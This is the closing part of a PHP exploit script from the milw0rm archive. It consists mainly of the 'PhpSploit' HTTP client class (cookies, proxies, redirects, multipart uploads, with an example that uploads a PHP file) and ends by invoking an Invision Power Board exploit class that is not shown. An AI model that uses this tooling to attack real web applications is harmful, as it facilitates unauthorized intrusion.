* This program is distributed in the hope that it will be useful,
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
* GNU General Public License for more details.
|
|
*
|
|
* You should have received a copy of the GNU General Public License
|
|
* along with this program; if not, write to the Free Software
|
|
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
|
|
*
|
|
* TITLE: PhpSploit Class
|
|
* REQUIREMENTS: PHP 4 / PHP 5
|
|
* VERSION: 2.1
|
|
* LICENSE: GNU General Public License
|
|
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
|
|
* FILENAME: phpsploitclass.php
|
|
*
|
|
* CONTACT: gmdarkfig@gmail.com (french / english)
|
|
* GREETZ: Sparah, Ddx39
|
|
*
|
|
* DESCRIPTION:
|
|
* The phpsploit is a class implementing a web user agent.
|
|
* You can add cookies, headers, use a proxy server with (or without) a
|
|
* basic authentification. It supports the GET and the POST method. It can
|
|
* also be used like a browser with the cookiejar() function (which allow
|
|
* a server to add several cookies for the next requests) and the
|
|
* allowredirection() function (which allow the script to follow all
|
|
* redirections sent by the server). It can return the content (or the
|
|
* headers) of the request. Others useful functions can be used for debugging.
|
|
* A manual is actually in development but to know how to use it, you can
|
|
* read the comments.
|
|
*
|
|
* CHANGELOG:
|
|
*
|
|
* [2008-08-29] (2.1)
|
|
* * New: The showheader()/showcookie() functions can now return an array
|
|
* * Bug #3 fixed: Problem concerning some servers for the main function
|
|
*
|
|
* [2007-06-10] (2.0)
|
|
* * Code: Code optimization
|
|
* * New: Compatible with PHP 4 by default
|
|
*
|
|
* [2007-01-24] (1.2)
|
|
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
|
|
* * New: multipart/form-data enctype is now supported
|
|
*
|
|
* [2006-12-31] (1.1)
|
|
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
|
|
* * New: You can now call the getheader() / getcontent() function without parameters
|
|
*
|
|
* [2006-12-30] (1.0)
|
|
* * First version
|
|
*
|
|
*/
|
|
|
|
class phpsploit
|
|
{
|
|
var $proxyhost;
|
|
var $proxyport;
|
|
var $host;
|
|
var $path;
|
|
var $port;
|
|
var $method;
|
|
var $url;
|
|
var $packet;
|
|
var $proxyuser;
|
|
var $proxypass;
|
|
var $header;
|
|
var $cookie;
|
|
var $data;
|
|
var $boundary;
|
|
var $allowredirection;
|
|
var $last_redirection;
|
|
var $cookiejar;
|
|
var $recv;
|
|
var $cookie_str;
|
|
var $header_str;
|
|
var $server_content;
|
|
var $server_header;
|
|
|
|
|
|
/**
|
|
* This function is called by the
|
|
* get()/post()/formdata() functions.
|
|
* You don't have to call it, this is
|
|
* the main function.
|
|
*
|
|
* @access private
|
|
* @return string $this->recv ServerResponse
|
|
*
|
|
*/
|
|
function sock()
|
|
{
|
|
if(!empty($this->proxyhost) && !empty($this->proxyport))
|
|
$socket = @fsockopen($this->proxyhost,$this->proxyport);
|
|
else
|
|
$socket = @fsockopen($this->host,$this->port);
|
|
|
|
if(!$socket)
|
|
die("Error: Host seems down");
|
|
|
|
if($this->method=='get')
|
|
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
|
|
|
|
elseif($this->method=='post' or $this->method=='formdata')
|
|
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
|
|
|
|
else
|
|
die("Error: Invalid method");
|
|
|
|
if(!empty($this->proxyuser))
|
|
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
|
|
|
|
if(!empty($this->header))
|
|
$this->packet .= $this->showheader();
|
|
|
|
if(!empty($this->cookie))
|
|
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
|
|
|
|
$this->packet .= 'Host: '.$this->host."\r\n";
|
|
$this->packet .= "Connection: Close\r\n";
|
|
|
|
if($this->method=='post')
|
|
{
|
|
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
|
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
|
|
$this->packet .= $this->data."\r\n";
|
|
}
|
|
elseif($this->method=='formdata')
|
|
{
|
|
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
|
|
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
|
|
$this->packet .= $this->data;
|
|
}
|
|
|
|
$this->packet .= "\r\n";
|
|
$this->recv = '';
|
|
|
|
fputs($socket, $this->packet);
|
|
|
|
while(!feof($socket))
|
|
$this->recv .= fgets($socket);
|
|
|
|
fclose($socket);
|
|
|
|
if($this->cookiejar)
|
|
$this->getcookie();
|
|
|
|
if($this->allowredirection)
|
|
return $this->getredirection();
|
|
else
|
|
return $this->recv;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function allows you to add several
|
|
* cookies in the request.
|
|
*
|
|
* @access public
|
|
* @param string cookn CookieName
|
|
* @param string cookv CookieValue
|
|
* @example $this->addcookie('name','value')
|
|
*
|
|
*/
|
|
function addcookie($cookn,$cookv)
|
|
{
|
|
if(!isset($this->cookie))
|
|
$this->cookie = array();
|
|
|
|
$this->cookie[$cookn] = $cookv;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function allows you to add several
|
|
* headers in the request.
|
|
*
|
|
* @access public
|
|
* @param string headern HeaderName
|
|
* @param string headervalue Headervalue
|
|
* @example $this->addheader('Client-IP', '128.5.2.3')
|
|
*
|
|
*/
|
|
function addheader($headern,$headervalue)
|
|
{
|
|
if(!isset($this->header))
|
|
$this->header = array();
|
|
|
|
$this->header[$headern] = $headervalue;
|
|
}
|
|
|
|
/**
|
|
* This function allows you to use an
|
|
* http proxy server. Several methods
|
|
* are supported.
|
|
*
|
|
* @access public
|
|
* @param string proxy ProxyHost
|
|
* @param integer proxyp ProxyPort
|
|
* @example $this->proxy('localhost',8118)
|
|
* @example $this->proxy('localhost:8118')
|
|
*
|
|
*/
|
|
function proxy($proxy,$proxyp='')
|
|
{
|
|
if(empty($proxyp))
|
|
{
|
|
$proxarr = explode(':',$proxy);
|
|
$this->proxyhost = $proxarr[0];
|
|
$this->proxyport = (int)$proxarr[1];
|
|
}
|
|
else
|
|
{
|
|
$this->proxyhost = $proxy;
|
|
$this->proxyport = (int)$proxyp;
|
|
}
|
|
|
|
if($this->proxyport > 65535)
|
|
die("Error: Invalid port number");
|
|
}
|
|
|
|
|
|
/**
|
|
* This function allows you to use an
|
|
* http proxy server which requires a
|
|
* basic authentification. Several
|
|
* methods are supported:
|
|
*
|
|
* @access public
|
|
* @param string proxyauth ProxyUser
|
|
* @param string proxypass ProxyPass
|
|
* @example $this->proxyauth('user','pwd')
|
|
* @example $this->proxyauth('user:pwd');
|
|
*
|
|
*/
|
|
function proxyauth($proxyauth,$proxypass='')
|
|
{
|
|
if(empty($proxypass))
|
|
{
|
|
$posvirg = strpos($proxyauth,':');
|
|
$this->proxyuser = substr($proxyauth,0,$posvirg);
|
|
$this->proxypass = substr($proxyauth,$posvirg+1);
|
|
}
|
|
else
|
|
{
|
|
$this->proxyuser = $proxyauth;
|
|
$this->proxypass = $proxypass;
|
|
}
|
|
}
|
|
|
|
|
|
/**
|
|
* This function allows you to set
|
|
* the 'User-Agent' header.
|
|
*
|
|
* @access public
|
|
* @param string useragent Agent
|
|
* @example $this->agent('Firefox')
|
|
*
|
|
*/
|
|
function agent($useragent)
|
|
{
|
|
$this->addheader('User-Agent',$useragent);
|
|
}
|
|
|
|
|
|
/**
|
|
* This function returns the headers
|
|
* which will be in the next request.
|
|
*
|
|
* @access public
|
|
* @return string $this->header_str Headers
|
|
* @return array $this->head Headers
|
|
* @example $this->showheader()
|
|
* @example $this->showheader(1)
|
|
*
|
|
*/
|
|
function showheader($array='')
|
|
{
|
|
$this->header_str = '';
|
|
|
|
if(!isset($this->header))
|
|
return;
|
|
|
|
if(!empty($array))
|
|
return $this->header;
|
|
|
|
foreach($this->header as $name => $value)
|
|
$this->header_str .= $name.': '.$value."\r\n";
|
|
|
|
return $this->header_str;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function returns the cookies
|
|
* which will be in the next request.
|
|
*
|
|
* @access public
|
|
* @return string $this->cookie_str Cookies
|
|
* @return array $this->cookie Cookies
|
|
* @example $this->showcookie()
|
|
* @example $this->showcookie(1)
|
|
*
|
|
*/
|
|
function showcookie($array='')
|
|
{
|
|
if(!isset($this->cookie))
|
|
return;
|
|
|
|
if(!empty($array))
|
|
return $this->cookie;
|
|
|
|
$this->cookie_str = '';
|
|
|
|
foreach($this->cookie as $name => $value)
|
|
$this->cookie_str .= $name.'='.$value.'; ';
|
|
|
|
return $this->cookie_str;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function returns the last
|
|
* formed http request.
|
|
*
|
|
* @access public
|
|
* @return string $this->packet HttpPacket
|
|
* @example $this->showlastrequest()
|
|
*
|
|
*/
|
|
function showlastrequest()
|
|
{
|
|
if(!isset($this->packet))
|
|
return;
|
|
else
|
|
return $this->packet;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function sends the formed
|
|
* http packet with the GET method.
|
|
*
|
|
* @access public
|
|
* @param string url Url
|
|
* @return string $this->sock()
|
|
* @example $this->get('localhost/index.php?var=x')
|
|
* @example $this->get('http://localhost:88/tst.php')
|
|
*
|
|
*/
|
|
function get($url)
|
|
{
|
|
$this->target($url);
|
|
$this->method = 'get';
|
|
return $this->sock();
|
|
}
|
|
|
|
|
|
/**
|
|
* This function sends the formed
|
|
* http packet with the POST method.
|
|
*
|
|
* @access public
|
|
* @param string url Url
|
|
* @param string data PostData
|
|
* @return string $this->sock()
|
|
* @example $this->post('http://localhost/','helo=x')
|
|
*
|
|
*/
|
|
function post($url,$data)
|
|
{
|
|
$this->target($url);
|
|
$this->method = 'post';
|
|
$this->data = $data;
|
|
return $this->sock();
|
|
}
|
|
|
|
|
|
/**
|
|
* This function sends the formed http
|
|
* packet with the POST method using
|
|
* the multipart/form-data enctype.
|
|
*
|
|
* @access public
|
|
* @param array array FormDataArray
|
|
* @return string $this->sock()
|
|
* @example $formdata = array(
|
|
* frmdt_url => 'http://localhost/upload.php',
|
|
* frmdt_boundary => '123456', # Optional
|
|
* 'var' => 'example',
|
|
* 'file' => array(
|
|
* frmdt_type => 'image/gif', # Optional
|
|
* frmdt_transfert => 'binary' # Optional
|
|
* frmdt_filename => 'hello.php,
|
|
* frmdt_content => '<?php echo 1; ?>'));
|
|
* $this->formdata($formdata);
|
|
*
|
|
*/
|
|
function formdata($array)
|
|
{
|
|
$this->target($array[frmdt_url]);
|
|
$this->method = 'formdata';
|
|
$this->data = '';
|
|
|
|
if(!isset($array[frmdt_boundary]))
|
|
$this->boundary = 'phpsploit';
|
|
else
|
|
$this->boundary = $array[frmdt_boundary];
|
|
|
|
foreach($array as $key => $value)
|
|
{
|
|
if(!preg_match('#^frmdt_(boundary|url)#',$key))
|
|
{
|
|
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
|
|
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
|
|
|
|
if(!is_array($value))
|
|
{
|
|
$this->data .= "\r\n\r\n".$value."\r\n";
|
|
}
|
|
else
|
|
{
|
|
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
|
|
|
|
if(isset($array[$key][frmdt_type]))
|
|
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
|
|
|
|
if(isset($array[$key][frmdt_transfert]))
|
|
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
|
|
|
|
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
|
|
}
|
|
}
|
|
}
|
|
|
|
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
|
|
return $this->sock();
|
|
}
|
|
|
|
|
|
/**
|
|
* This function returns the content
|
|
* of the server response, without
|
|
* the headers.
|
|
*
|
|
* @access public
|
|
* @param string code ServerResponse
|
|
* @return string $this->server_content
|
|
* @example $this->getcontent()
|
|
* @example $this->getcontent($this->get('http://localhost/'))
|
|
*
|
|
*/
|
|
function getcontent($code='')
|
|
{
|
|
if(empty($code))
|
|
$code = $this->recv;
|
|
|
|
$code = explode("\r\n\r\n",$code);
|
|
$this->server_content = '';
|
|
|
|
for($i=1;$i<count($code);$i++)
|
|
$this->server_content .= $code[$i];
|
|
|
|
return $this->server_content;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function returns the headers
|
|
* of the server response, without
|
|
* the content.
|
|
*
|
|
* @access public
|
|
* @param string code ServerResponse
|
|
* @return string $this->server_header
|
|
* @example $this->getcontent()
|
|
* @example $this->getcontent($this->post('http://localhost/','1=2'))
|
|
*
|
|
*/
|
|
function getheader($code='')
|
|
{
|
|
if(empty($code))
|
|
$code = $this->recv;
|
|
|
|
$code = explode("\r\n\r\n",$code);
|
|
$this->server_header = $code[0];
|
|
|
|
return $this->server_header;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function is called by the
|
|
* cookiejar() function. It adds the
|
|
* value of the "Set-Cookie" header
|
|
* in the "Cookie" header for the
|
|
* next request. You don't have to
|
|
* call it.
|
|
*
|
|
* @access private
|
|
* @param string code ServerResponse
|
|
*
|
|
*/
|
|
function getcookie()
|
|
{
|
|
foreach(explode("\r\n",$this->getheader()) as $header)
|
|
{
|
|
if(preg_match('/set-cookie/i',$header))
|
|
{
|
|
$fequal = strpos($header,'=');
|
|
$fvirgu = strpos($header,';');
|
|
|
|
// 12=strlen('set-cookie: ')
|
|
$cname = substr($header,12,$fequal-12);
|
|
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
|
|
|
|
$this->cookie[trim($cname)] = trim($cvalu);
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
/**
|
|
* This function is called by the
|
|
* get()/post() functions. You
|
|
* don't have to call it.
|
|
*
|
|
* @access private
|
|
* @param string urltarg Url
|
|
* @example $this->target('http://localhost/')
|
|
*
|
|
*/
|
|
function target($urltarg)
|
|
{
|
|
if(!ereg('^http://',$urltarg))
|
|
$urltarg = 'http://'.$urltarg;
|
|
|
|
$urlarr = parse_url($urltarg);
|
|
|
|
if(!isset($urlarr['path']) || empty($urlarr['path']))
|
|
die("Error: No path precised");
|
|
|
|
$this->url = $urlarr['path'];
|
|
|
|
if(isset($urlarr['query']))
|
|
$this->url .= '?'.$urlarr['query'];
|
|
|
|
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
|
|
$this->host = $urlarr['host'];
|
|
|
|
if($this->port != '80')
|
|
$this->host .= ':'.$this->port;
|
|
|
|
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
|
|
|
|
if($this->port > 65535)
|
|
die("Error: Invalid port number");
|
|
}
|
|
|
|
|
|
/**
|
|
* If you call this function,
|
|
* the script will extract all
|
|
* 'Set-Cookie' headers values
|
|
* and it will automatically add
|
|
* them into the 'Cookie' header
|
|
* for all next requests.
|
|
*
|
|
* @access public
|
|
* @param integer code 1(enabled) 0(disabled)
|
|
* @example $this->cookiejar(0)
|
|
* @example $this->cookiejar(1)
|
|
*
|
|
*/
|
|
function cookiejar($code)
|
|
{
|
|
if($code=='0')
|
|
$this->cookiejar=FALSE;
|
|
|
|
elseif($code=='1')
|
|
$this->cookiejar=TRUE;
|
|
}
|
|
|
|
|
|
/**
|
|
* If you call this function,
|
|
* the script will follow all
|
|
* redirections sent by the server.
|
|
*
|
|
* @access public
|
|
* @param integer code 1(enabled) 0(disabled)
|
|
* @example $this->allowredirection(0)
|
|
* @example $this->allowredirection(1)
|
|
*
|
|
*/
|
|
function allowredirection($code)
|
|
{
|
|
if($code=='0')
|
|
$this->allowredirection=FALSE;
|
|
|
|
elseif($code=='1')
|
|
$this->allowredirection=TRUE;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function is called if
|
|
* allowredirection() is enabled.
|
|
* You don't have to call it.
|
|
*
|
|
* @access private
|
|
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
|
|
* @return string $this->get($this->last_redirection)
|
|
* @return string $this->recv;
|
|
*
|
|
*/
|
|
function getredirection()
|
|
{
|
|
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
|
|
{
|
|
$this->last_redirection = trim($codearr[2]);
|
|
|
|
if(!ereg('://',$this->last_redirection))
|
|
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
|
|
|
|
else
|
|
return $this->get($this->last_redirection);
|
|
}
|
|
else
|
|
return $this->recv;
|
|
}
|
|
|
|
|
|
/**
|
|
* This function allows you
|
|
* to reset some parameters.
|
|
*
|
|
* @access public
|
|
* @param string func Param
|
|
* @example $this->reset('header')
|
|
* @example $this->reset('cookie')
|
|
* @example $this->reset()
|
|
*
|
|
*/
|
|
function reset($func='')
|
|
{
|
|
switch($func)
|
|
{
|
|
case 'header':
|
|
$this->header = array();
|
|
break;
|
|
|
|
case 'cookie':
|
|
$this->cookie = array();
|
|
break;
|
|
|
|
default:
|
|
$this->cookiejar = '';
|
|
$this->header = array();
|
|
$this->cookie = array();
|
|
$this->allowredirection = '';
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
$web = new phpsploit;
|
|
$web->cookiejar(1);
|
|
$web->agent('Mozilla Firefox');
|
|
|
|
$ipb = new ipb_spl;
|
|
$ipb->web =& $web;
|
|
$ipb->main();
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2008-08-29]
|